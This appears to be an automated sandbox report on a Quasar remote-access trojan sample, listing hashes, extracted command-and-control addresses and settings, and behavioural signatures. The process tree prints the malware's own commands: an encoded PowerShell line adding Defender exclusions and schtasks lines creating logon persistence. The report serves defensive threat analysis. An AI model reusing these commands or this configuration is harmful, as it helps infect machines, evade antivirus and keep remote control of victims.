Analysis
-
max time kernel
126s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
09/01/2023, 14:25
Static task
static1
Behavioral task
behavioral1
Sample
58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe
Resource
win7-20220812-en
General
-
Target
58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe
-
Size
354KB
-
MD5
8b54bcaf180119658155a1ba2909f082
-
SHA1
7813044ffe233a79eb5937e6affcfbc365427fc1
-
SHA256
58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5
-
SHA512
fb9f1fe603c69a27c1fbf40067be9ef3273a791a40e8f262d98e2c16dcd1c6ecc36f359f1a8119532a078e0ba8f4065dc2ef44a1282d9b2f41578551ab8f6fd8
-
SSDEEP
6144:XbRHhzisehcChBB6aQaAIybtbJpHgxwkeDBWeSXpU+PtL11J//LbwDJQHgYCBfuB:Xb/Shzn4tbPAGkeLatL11J//LUDaAY2C
Malware Config
Extracted
quasar
1.3.0.0
Office04
192.168.0.125:4782
AeroNaut-25032.portmap.io:25032
QSR_MUTEX_e22Aj87Wn2XuKgDxxw
-
encryption_key
s8zrhKuw28Jjzjqpd6lo
-
install_name
Java.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
JavaStartup
-
subdirectory
SubDir
Signatures
-
Quasar payload 8 IoCs
resource yara_rule behavioral1/files/0x0007000000015c29-60.dat family_quasar behavioral1/files/0x0007000000015c29-63.dat family_quasar behavioral1/files/0x0007000000015c29-64.dat family_quasar behavioral1/memory/820-65-0x0000000000170000-0x00000000001CE000-memory.dmp family_quasar behavioral1/files/0x0007000000015c60-70.dat family_quasar behavioral1/files/0x0007000000015c60-72.dat family_quasar behavioral1/files/0x0007000000015c60-73.dat family_quasar behavioral1/memory/1996-74-0x0000000000010000-0x000000000006E000-memory.dmp family_quasar -
Executes dropped EXE 2 IoCs
pid Process 820 Client-built.exe 1996 Java.exe -
Loads dropped DLL 2 IoCs
pid Process 1088 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 820 Client-built.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files (x86)\SubDir\Java.exe Client-built.exe File opened for modification C:\Program Files (x86)\SubDir\Java.exe Client-built.exe File opened for modification C:\Program Files (x86)\SubDir\Java.exe Java.exe File opened for modification C:\Program Files (x86)\SubDir Java.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 668 schtasks.exe 2012 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 304 powershell.exe 932 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 304 powershell.exe Token: SeDebugPrivilege 932 powershell.exe Token: SeDebugPrivilege 820 Client-built.exe Token: SeDebugPrivilege 1996 Java.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1996 Java.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 1088 wrote to memory of 304 1088 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 27 PID 1088 wrote to memory of 304 1088 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 27 PID 1088 wrote to memory of 304 1088 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 27 PID 1088 wrote to memory of 304 1088 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 27 PID 1088 wrote to memory of 932 1088 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 29 PID 1088 wrote to memory of 932 1088 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 29 PID 1088 wrote to memory of 932 1088 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 29 PID 1088 wrote to memory of 932 1088 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 29 PID 1088 wrote to memory of 820 1088 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 31 PID 1088 wrote to memory of 820 1088 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 31 PID 1088 wrote to memory of 820 1088 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 31 PID 1088 wrote to memory of 820 1088 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 31 PID 820 wrote to memory of 668 820 Client-built.exe 33 PID 820 wrote to memory of 668 820 Client-built.exe 33 PID 820 wrote to memory of 668 820 Client-built.exe 33 PID 820 wrote to memory of 668 820 Client-built.exe 33 PID 820 wrote to memory of 1996 820 Client-built.exe 35 PID 820 wrote to memory of 1996 820 Client-built.exe 35 PID 820 wrote to memory of 1996 820 Client-built.exe 35 PID 820 wrote to memory of 1996 820 Client-built.exe 35 PID 820 wrote to memory of 1996 820 Client-built.exe 35 PID 820 wrote to memory of 1996 820 Client-built.exe 35 PID 820 wrote to memory of 1996 820 Client-built.exe 35 PID 1996 wrote to memory of 2012 1996 Java.exe 36 PID 1996 wrote to memory of 2012 1996 Java.exe 36 PID 1996 wrote to memory of 2012 1996 Java.exe 36 PID 1996 wrote to memory of 2012 1996 Java.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe"C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAegBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAZAB0ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUwBvAHIAcgB5ACAAdABoAGUAIABmAGkAbABlACAAaQBzACAAdQBuAGQAZQByACAAbQBhAG4AYQBnAGUAbQBlAG4AdAAuACAAVABoAGUAIABmAGkAbABlACAAdwBpAGwAbAAgAGIAZQAgAHIAZQBsAGUAYQBzAGUAZAAgAG4AZQB4AHQAIAB5AGUAYQByACEAIABmAG8AcgAgAG0AbwByAGUAIABmAGkAbABlAHMAIAAsACAAcABsAGUAYQBzAGUAIABjAGgAZQBjAGsAIABtAHkAIABkAGkAcwBjAG8AcgBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHQAbABmACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:304
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAaQBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAaQB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAeABrACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:932
-
-
C:\Users\Admin\AppData\Local\Temp\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Client-built.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:668
-
-
C:\Program Files (x86)\SubDir\Java.exe"C:\Program Files (x86)\SubDir\Java.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Program Files (x86)\SubDir\Java.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:2012
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
348KB
MD5c1c21a2fdc2f99f98c91ce2d1219cd96
SHA15bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA2560b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA5123b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf
-
Filesize
348KB
MD5c1c21a2fdc2f99f98c91ce2d1219cd96
SHA15bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA2560b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA5123b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf
-
Filesize
348KB
MD5c1c21a2fdc2f99f98c91ce2d1219cd96
SHA15bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA2560b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA5123b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf
-
Filesize
348KB
MD5c1c21a2fdc2f99f98c91ce2d1219cd96
SHA15bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA2560b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA5123b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD509491f53829b6a3bab13fb0e98fab068
SHA1815480a0cf434ac34ddd7bc031066ed14687395c
SHA256257644182d9199a83598c76c73f9418ad4697c585e3192fedaaee8332710cc23
SHA512dd487a30ad1fe189b9fc4cbc4db2df23c0ecc0b259f5c3209c1ba85f8646f1c615ca0a2567af1dfe5efccae8227b4eb592aca7b9b9a3668dc7ccfa3e54e81adc
-
Filesize
348KB
MD5c1c21a2fdc2f99f98c91ce2d1219cd96
SHA15bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA2560b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA5123b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf
-
Filesize
348KB
MD5c1c21a2fdc2f99f98c91ce2d1219cd96
SHA15bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA2560b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA5123b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf